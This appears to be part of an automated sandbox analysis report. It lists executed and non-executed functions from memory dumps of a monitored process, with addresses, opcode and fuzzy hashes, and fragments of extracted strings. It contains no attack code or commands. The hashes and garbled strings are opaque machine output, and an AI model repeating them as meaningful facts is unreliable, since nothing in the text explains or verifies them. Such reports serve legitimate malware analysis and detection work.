                                        Function 045A767F Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4527f27250d7b8868b01ebd37ea47bf2c458450996bfd2e55d9fa11dc6006ad
                                        • Instruction ID: 5c8c4151cd90368dfbfa22f07e7dbba49ff3cf1473cf9aea7522d3dff9a7ec2d
                                        • Opcode Fuzzy Hash: a4527f27250d7b8868b01ebd37ea47bf2c458450996bfd2e55d9fa11dc6006ad
                                        • Instruction Fuzzy Hash: 35F08C367006148FDB10AAA8A840A9D77E2FFCD65171941A8E909CB311DB24EC139B90
                                        Function 045A90E8 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00b47f9648cfc8cb8c6e1cf9831826417ddaee60c36eed059e73f55f0e0b8b2f
                                        • Instruction ID: d060e3232945e75cdeb106c52e39bc79c3b2eec11a53cb8944d036830e2712d4
                                        • Opcode Fuzzy Hash: 00b47f9648cfc8cb8c6e1cf9831826417ddaee60c36eed059e73f55f0e0b8b2f
                                        • Instruction Fuzzy Hash: 82F027B5B042085BE304BF68D00979F7BA6EFC4724F14816AD50A47784CE393D05CBD0
                                        Function 045ADE48 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b357c644d8927ea23959c75b0622071913e09697c0c2e4ccb79fb95063c6125e
                                        • Instruction ID: d652aacfa7bd77313eb4d45d1458842a7d1830094907a45b000af0834e127fdf
                                        • Opcode Fuzzy Hash: b357c644d8927ea23959c75b0622071913e09697c0c2e4ccb79fb95063c6125e
                                        • Instruction Fuzzy Hash: 3FE01A357002108F8310AF6DE498C6AB7FAEFCEB6531900A9F549CBB31DA61EC11DB90
                                        Function 045AAF88 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 25561179f13a59a73fea975bd1c975fc334e592f875f677e00d9b2ea0046ecb0
                                        • Instruction ID: 45a3dcbbeded9c3457e274b5b137b5751ae6248d02ecd182ecfebb5e5797f254
                                        • Opcode Fuzzy Hash: 25561179f13a59a73fea975bd1c975fc334e592f875f677e00d9b2ea0046ecb0
                                        • Instruction Fuzzy Hash: B1E0D82B7083D60BCB16803978603D9AFA79BC753170980B7E8408B286DD525C5683E1
                                        Function 045AE91E Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d27d4e79ab1abbb872dea8699830ebb1f80da9909d2ccdb8d75d711d6c8a85b6
                                        • Instruction ID: 8f5f331e19ddbbcbc32465a342205a392de42b61d41460eadfd11187e1c2b0d2
                                        • Opcode Fuzzy Hash: d27d4e79ab1abbb872dea8699830ebb1f80da9909d2ccdb8d75d711d6c8a85b6
                                        • Instruction Fuzzy Hash: D2F06D39A01118DFCB00CF98E98AD9DBBB2FF88611B158155F905A7351CB31AD11CF40
                                        Function 045AC33F Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad67f8b8dab9b98421cadf1999b161440e7da55f59f229f2d468226250d4e0b8
                                        • Instruction ID: 69ef9416faabd48b12c87604216b0f20162e0140d7f9c988a7cac554398dc908
                                        • Opcode Fuzzy Hash: ad67f8b8dab9b98421cadf1999b161440e7da55f59f229f2d468226250d4e0b8
                                        • Instruction Fuzzy Hash: FBE0D8363042114FD314C6B5A494A6B7B96FBC8365F18403FD609C7391DD71D801D250
                                        Function 045ACB68 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d1d209a3b241f5393cdabf7fd784bbea9cec96f652c74d055d5d87c82a923de
                                        • Instruction ID: 2ba54a4c44116c182a1f10fa2e950cf2f001b3498a2ab1769e1fc0cbfa168c39
                                        • Opcode Fuzzy Hash: 2d1d209a3b241f5393cdabf7fd784bbea9cec96f652c74d055d5d87c82a923de
                                        • Instruction Fuzzy Hash: 04E04871200310578124A65EEC4146EBACEDEC52A0754492DD94E97600DE756D0A87A5
                                        Function 045A9549 Relevance: .0, Instructions: 26COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d95a4682d74123cb1e1b6a6b5fe90d6bbd70c9351c894dbd6c43d6edb58df79b
                                        • Instruction ID: 721487fa06100e33a07a0194076e7e436ae0698addd47bd406cb8c3021a6636d
                                        • Opcode Fuzzy Hash: d95a4682d74123cb1e1b6a6b5fe90d6bbd70c9351c894dbd6c43d6edb58df79b
                                        • Instruction Fuzzy Hash: 16D05B6774112627565470B928516FF99CFBFC84AD70D4037D905C7741EC40EC2663F1
                                        Function 045A9168 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c35148d5fa820e771d491d296ec30881af2c1f77a82bb7385e512b2f5e981b4
                                        • Instruction ID: 1b354ddeca049f952027c387e57d9c524c7eca03163c286d851ef029f1762cd0
                                        • Opcode Fuzzy Hash: 7c35148d5fa820e771d491d296ec30881af2c1f77a82bb7385e512b2f5e981b4
                                        • Instruction Fuzzy Hash: A0F06DB0A003144BD7609F78E89C79ABBE5FB84320F004469E20ED7380DF3968808B90
                                        Function 045A8978 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c4bff746e675eef76f5dcd86493a4b6578ae99aff729a6d76122ccbb2e3e3ae
                                        • Instruction ID: 82644956a890f9f281dc934a88b42d22ddacb7209c59ebd118a9b8bf84b83ca1
                                        • Opcode Fuzzy Hash: 1c4bff746e675eef76f5dcd86493a4b6578ae99aff729a6d76122ccbb2e3e3ae
                                        • Instruction Fuzzy Hash: 8BE0DF3130431847CB083B78E80C2AE7A56FBC8735F00022AE70683380CF2C590193E9
                                        Function 045A9550 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7548d4253a302318bdb6a2798d21ddf38c8e47b27c0f95e88354dfbc3c72dc7b
                                        • Instruction ID: 17ad23c064ad9127ca4ba5c45b2f453ffa01b77e73b831dabadbd82f30daf603
                                        • Opcode Fuzzy Hash: 7548d4253a302318bdb6a2798d21ddf38c8e47b27c0f95e88354dfbc3c72dc7b
                                        • Instruction Fuzzy Hash: C7D05EA270112627565470BA28506BF99CFAFC84A870D00369A09C7241EC40EC26A3E1
                                        Function 045AC580 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 170673a2212a541c0414a5bec762f25b6b8953cb4436c3cabc1ba43e4c502999
                                        • Instruction ID: 9c40314f496c4476149b73f7d0683ecead947add51c38f701e5b4ca93512135d
                                        • Opcode Fuzzy Hash: 170673a2212a541c0414a5bec762f25b6b8953cb4436c3cabc1ba43e4c502999
                                        • Instruction Fuzzy Hash: 46E086727042946BC304627CF8254697BD5EAC5A6234440BBF609C3741DD199C0187A5
                                        Function 045ADCE8 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction ID: c8bd53d888ba6c9372158c2f38f696b5cc9e1c5fc92b9a62c2ff65c71cf06f0e
                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction Fuzzy Hash: 97E08635B10014A78B08995DD4104EDF7BAEBCC220F04847AD90AA7740DA32691996E1
                                        Function 045ADC98 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a4307011ca958e38b4035223ecf5fc3a58a3cd494a187902788a8e4424d4de6
                                        • Instruction ID: fdfbe83791f4c227995764c2985a369152f6f8e0ee26b336e0c25388f60a5169
                                        • Opcode Fuzzy Hash: 5a4307011ca958e38b4035223ecf5fc3a58a3cd494a187902788a8e4424d4de6
                                        • Instruction Fuzzy Hash: 85E0C232700B14478316B62EB81089FB7EBEFC5671300442EE11ACBB00DE64FD0A57E5
                                        Function 045AF458 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af5b0b7dcb70535fbe01d8f4c8de2a068b85ce7f071b231c4fb82669db6943b8
                                        • Instruction ID: 2bcaa3996cdf82e79344499d21c95788b2bde27e00b6232742d8543cc1d5b5bb
                                        • Opcode Fuzzy Hash: af5b0b7dcb70535fbe01d8f4c8de2a068b85ce7f071b231c4fb82669db6943b8
                                        • Instruction Fuzzy Hash: 23E0DF70D00249AFC380EFBCC80156EFFF4EB88210F2088AED948D7301E6328A129BD1
                                        Function 045A8739 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 821e6bc3fd978c1d4c695aad93d9f4aeaa644b9ffb3d25c3ed9698fe6c2eb69d
                                        • Instruction ID: 72d5f1a1e76261e90e5bf44d22fe3f9ada4aada67e95175ab54ef8396916f7a2
                                        • Opcode Fuzzy Hash: 821e6bc3fd978c1d4c695aad93d9f4aeaa644b9ffb3d25c3ed9698fe6c2eb69d
                                        • Instruction Fuzzy Hash: DDE0DF35C0430E8BCB08BB70E80A6EDBFB4FB01311F000359DE42826D1EB311A5ACAC1
                                        Function 045A8800 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d50281383da495fd83f90917d4c5da28b77b4b953d98b45faab18063305dc97
                                        • Instruction ID: cffa9c6b4e522e9954420ddecf98b8595804d28ea2a0616eeb1b1e74a43d56c6
                                        • Opcode Fuzzy Hash: 9d50281383da495fd83f90917d4c5da28b77b4b953d98b45faab18063305dc97
                                        • Instruction Fuzzy Hash: E2E0DF38A0830E8BC744DF74E486969BFF0FB49211F004315EE1993380EB306891DBC1
                                        Function 045AC590 Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1d9e410ec147b45fdbe08d46bc9c5aa1fee635619610181c778f3071f06558e
                                        • Instruction ID: 1842d0777557c837a20f17bf3204df67a0c3f7a47ffb222f967abc165e0e7a5f
                                        • Opcode Fuzzy Hash: e1d9e410ec147b45fdbe08d46bc9c5aa1fee635619610181c778f3071f06558e
                                        • Instruction Fuzzy Hash: 3FD0C7753006246B8204676DF41655977D9FBC9E63344017AF71DC3740DE659C0587E5
                                        Function 045AF468 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction ID: c6000c0d5ca5d1c0d0c1a894a155f675ee8a46b1ea4808324736c0c37350994d
                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction Fuzzy Hash: B1D067B1D0420D9F8780EFADD94156EFBF4EB48200F6085AA8919E7301F7329A129BD1
                                        Function 045A8748 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35f4a3e4b2c6c64129279fbb025487c2d69e4447fc0e022b13eafe42b46c88a8
                                        • Instruction ID: 15e1df2345bb34000807242e718b115e5691cee0fdf54844d8160b5aeca557ab
                                        • Opcode Fuzzy Hash: 35f4a3e4b2c6c64129279fbb025487c2d69e4447fc0e022b13eafe42b46c88a8
                                        • Instruction Fuzzy Hash: 2AD0677590420D8BDB08ABB5E85B4BDBB74FA54301F404269DA0752690EB352A5ACAC5
                                        Function 045A8810 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3cee4c907a902410b67f1f99cab26fccb2881b0825f7b74485dda93bbf365288
                                        • Instruction ID: a6954a6c47f43bf3aae5017f02f0dde40ec5c5a4bdbf3c3817bc119d0830a452
                                        • Opcode Fuzzy Hash: 3cee4c907a902410b67f1f99cab26fccb2881b0825f7b74485dda93bbf365288
                                        • Instruction Fuzzy Hash: FED01274A0820E8FCB44EF64D44686EBBF4FB44200F004155DA0593340EA306D11DFC1
                                        Function 045A791A Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4dcc06113a2cd7a5508621ccffa8da2cef8f0d15d630f91c989826465eaf29ab
                                        • Instruction ID: 77f4aa9da58e9f229a713104c5f13ee8fd3261bbe7a969ce795ce6626446b437
                                        • Opcode Fuzzy Hash: 4dcc06113a2cd7a5508621ccffa8da2cef8f0d15d630f91c989826465eaf29ab
                                        • Instruction Fuzzy Hash: B2D0C93514D3C49FCB2B8FB9E4A48D83F715E4322470914DED8868F9B3C9368489CB06
                                        Function 045AEA47 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae9a4ec2ea8603dfa6ef77f4a73aedc47320879e6f44101e471923ed295058af
                                        • Instruction ID: 70481391838cc1de7007086fef99bc9b61992f1538a7e164a2dbb26426525726
                                        • Opcode Fuzzy Hash: ae9a4ec2ea8603dfa6ef77f4a73aedc47320879e6f44101e471923ed295058af
                                        • Instruction Fuzzy Hash: A5D09239B40218CFCB04CB94E89AA9DF371FB84315F5080A6EA1597351CB32AD16CB40
                                        Function 045A7E90 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5cd42811e3ea9d3fe22dc0eb6c2ac78b110fdd1c31deae8a35f2f44de9840ab8
                                        • Instruction ID: 327ce37567caa532e3d3442f602ad74e1015af8f53fd0adffbfece24a70031e1
                                        • Opcode Fuzzy Hash: 5cd42811e3ea9d3fe22dc0eb6c2ac78b110fdd1c31deae8a35f2f44de9840ab8
                                        • Instruction Fuzzy Hash: 34C0481A18FBC49EE703523148A1682AF301A4202038F12CB8180CE9A3C24D880ACB53
                                        Function 045A7928 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8cf9ba712b215eea32ce0cc09931df3700530fcec52784042779bb807e6a1279
                                        • Instruction ID: 464a75f62b4f717c06eaffcdff4e0e36be4a8dc3232ce7c3aa52192ef8d0661a
                                        • Opcode Fuzzy Hash: 8cf9ba712b215eea32ce0cc09931df3700530fcec52784042779bb807e6a1279
                                        • Instruction Fuzzy Hash: AEB09231044B088FC25C6FB9E414818772EAB8431578004ACE80E0BA928E36E885CA84

                                        Non-executed Functions

                                        Function 07361BE0 Relevance: 11.7, Strings: 9, Instructions: 408COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2015781577.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: 84l$84l$Jl$Jl$Jl$Jl$Jl$rl$rl
                                        • API String ID: 0-2781278049
                                        • Opcode ID: 481dc1954201e9070718e6da1611e187413956e678c0bd009b65a595ced83b74
                                        • Instruction ID: add488c92b32acc94945da8595eb7ef8149ad736d4cac409b9a860030b9ce3a0
                                        • Opcode Fuzzy Hash: 481dc1954201e9070718e6da1611e187413956e678c0bd009b65a595ced83b74
                                        • Instruction Fuzzy Hash: 1DD15CB5B0434ACFE7259B69840866BBFB6AFC6311F24C46BC549CF259DB31C841C7A2

                                        Executed Functions

                                        Function 04FEB490 Relevance: 4.0, Strings: 3, Instructions: 258COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: kU3n^${U3n^$[3n^
                                        • API String ID: 0-3138937978
                                        • Opcode ID: 2068b8dfb386be24d8622d32cc40486848904c0c8a2cf7749cf0346d587348c1
                                        • Instruction ID: 794b7b351b2e13c2128610e02adaa542bf97f59489254db8820b042355f902e1
                                        • Opcode Fuzzy Hash: 2068b8dfb386be24d8622d32cc40486848904c0c8a2cf7749cf0346d587348c1
                                        • Instruction Fuzzy Hash: 61916070F00B159BEB29EFB9941066E7BB2AFC4B00B40891DD516AF384DF3469078BD5
                                        Function 04FEB4A0 Relevance: 4.0, Strings: 3, Instructions: 252COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: kU3n^${U3n^$[3n^
                                        • API String ID: 0-3138937978
                                        • Opcode ID: f8a87345755f44543411ea94b40f40c9bfbd82b713a2e6558b04774b422f9276
                                        • Instruction ID: 51440fca68b7075b3546a81af98dc976cb36b8df59eb815587fd04d756220588
                                        • Opcode Fuzzy Hash: f8a87345755f44543411ea94b40f40c9bfbd82b713a2e6558b04774b422f9276
                                        • Instruction Fuzzy Hash: 23914071F00B149BEB29EFB9941066E7BB2EFC4B00B40892CD516AB344DF746A078BD5
                                        Function 079824D8 Relevance: 8.0, Strings: 6, Instructions: 489COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2023765064.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: _$Jl$Jl$Jl$rl$rl
                                        • API String ID: 0-956669229
                                        • Opcode ID: 808a4148be4ad30f51321e5d6966602d174f172b2dbfb486753611415ff19495
                                        • Instruction ID: cc0e229b2d256278ef4ab839782d2298a2b99c8e9fe4b4176c79b022cd5ce6d0
                                        • Opcode Fuzzy Hash: 808a4148be4ad30f51321e5d6966602d174f172b2dbfb486753611415ff19495
                                        • Instruction Fuzzy Hash: BDF138B1B00306CFDB65AB69C8017AABBE5BF85315F1484BAD905CF291DB31DD41C7A1
                                        Function 08AD715B Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2037801124.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: 58c8f50f4238709c0bf83b55f167386305ceb86cc317ee32ed137ed6c24cc37c
                                        • Instruction ID: 7b33ec8c561d808b13a37e82cf8bd582ad9f4026fd2a4bcece2701bfc6f99288
                                        • Opcode Fuzzy Hash: 58c8f50f4238709c0bf83b55f167386305ceb86cc317ee32ed137ed6c24cc37c
                                        • Instruction Fuzzy Hash: 811125B5D003498FDB20DF9AC885B9EFBF4EB89325F24841AE419A3750C774A945CFA0
                                        Function 08AD7160 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2037801124.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: e5e22d79558df595e7be6d4abb9b7f7f57f46eff733e8f1d3086e8220828ce60
                                        • Instruction ID: 30be6f6673196595e5c2a0c2f2865130a7ec2364a25c85c0be62063d04fa0f2d
                                        • Opcode Fuzzy Hash: e5e22d79558df595e7be6d4abb9b7f7f57f46eff733e8f1d3086e8220828ce60
                                        • Instruction Fuzzy Hash: E41133B5D003088FDB20DF9AC885B9EFBF8EB48324F24841AE419A3350C774A945CFA0
                                        Function 04FEE5C1 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Jl
                                        • API String ID: 0-143229547
                                        • Opcode ID: e7614d351a247cdea2b480b0dfb79baa881772547e38e65a5115a629cbd725ce
                                        • Instruction ID: 9e3c85a59cd902abb110cae56c789045676528af4152cf67402560140c90a305
                                        • Opcode Fuzzy Hash: e7614d351a247cdea2b480b0dfb79baa881772547e38e65a5115a629cbd725ce
                                        • Instruction Fuzzy Hash: 69418D34E042059FCB25DFBAE8546ADBBF1EF49312F1081A9D415AB395DB307D0ACB91
                                        Function 04FEE610 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Jl
                                        • API String ID: 0-143229547
                                        • Opcode ID: ed5d86af1b6872195829dd425d167ce740bd391d3cad6d04dc55f6b91486ca2b
                                        • Instruction ID: 00ef1b387178700b704d0b6fa11a3ca53e0b0df68e05b9f5ed2d7d975364789a
                                        • Opcode Fuzzy Hash: ed5d86af1b6872195829dd425d167ce740bd391d3cad6d04dc55f6b91486ca2b
                                        • Instruction Fuzzy Hash: 2341CE74A00205DFCB15DF6AE4546ADBBF2EF48302F148569D416AB395DB30BD06CB91
                                        Function 04FEE640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Jl
                                        • API String ID: 0-143229547
                                        • Opcode ID: 370b9784e44ef615b93a148ba9c84bcd00179898ea5682abe49e8af47fb226e0
                                        • Instruction ID: 5ba253d555eeac8ab632eebd4b36d628a0f885b20a9547df5057166bd3549a25
                                        • Opcode Fuzzy Hash: 370b9784e44ef615b93a148ba9c84bcd00179898ea5682abe49e8af47fb226e0
                                        • Instruction Fuzzy Hash: 73316D34A00206DFDB24DF69E594A9EBBF2FF88205F108528D416AB344DB34AD05CB91
                                        Function 04FEDD17 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: .3n^
                                        • API String ID: 0-402911317
                                        • Opcode ID: 8aafd78d4860f25a1dd3fca028bd68b48e65c9bf24b338851d29f82e3d8a4326
                                        • Instruction ID: d547b8bc0f95491622933a35793a503af6c8a4c359b36e893512c22a39111847
                                        • Opcode Fuzzy Hash: 8aafd78d4860f25a1dd3fca028bd68b48e65c9bf24b338851d29f82e3d8a4326
                                        • Instruction Fuzzy Hash: 2E0128317042155BCB2A5A5FD8044FDBBAACFCA222704806AE409D7B50EE61FC0787E1
                                        Function 04FEDD28 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: .3n^
                                        • API String ID: 0-402911317
                                        • Opcode ID: 79604d878dde92fe719e8b2d5fab7d67f735f1c4cb1c413083735eceb2446565
                                        • Instruction ID: 3a240e7ae19b0de6b92347a9f1332a142dcef8000fd69f2c9954340e00d86bc2
                                        • Opcode Fuzzy Hash: 79604d878dde92fe719e8b2d5fab7d67f735f1c4cb1c413083735eceb2446565
                                        • Instruction Fuzzy Hash: 69E0C231740A11479226671EA8008AFB7EADFC6672311802EE41ACB700DE60FC0647D5
                                        Function 07983CE8 Relevance: .6, Instructions: 588COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2023765064.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed2b7bb5c33c74c8dd6d85f82b8acc8840649a2637658a0a813fa6c6d5d10674
                                        • Instruction ID: 8106c021366a0cedecdcfb5a5463fb4b3ddbcf355ea376c78d4b300570880464
                                        • Opcode Fuzzy Hash: ed2b7bb5c33c74c8dd6d85f82b8acc8840649a2637658a0a813fa6c6d5d10674
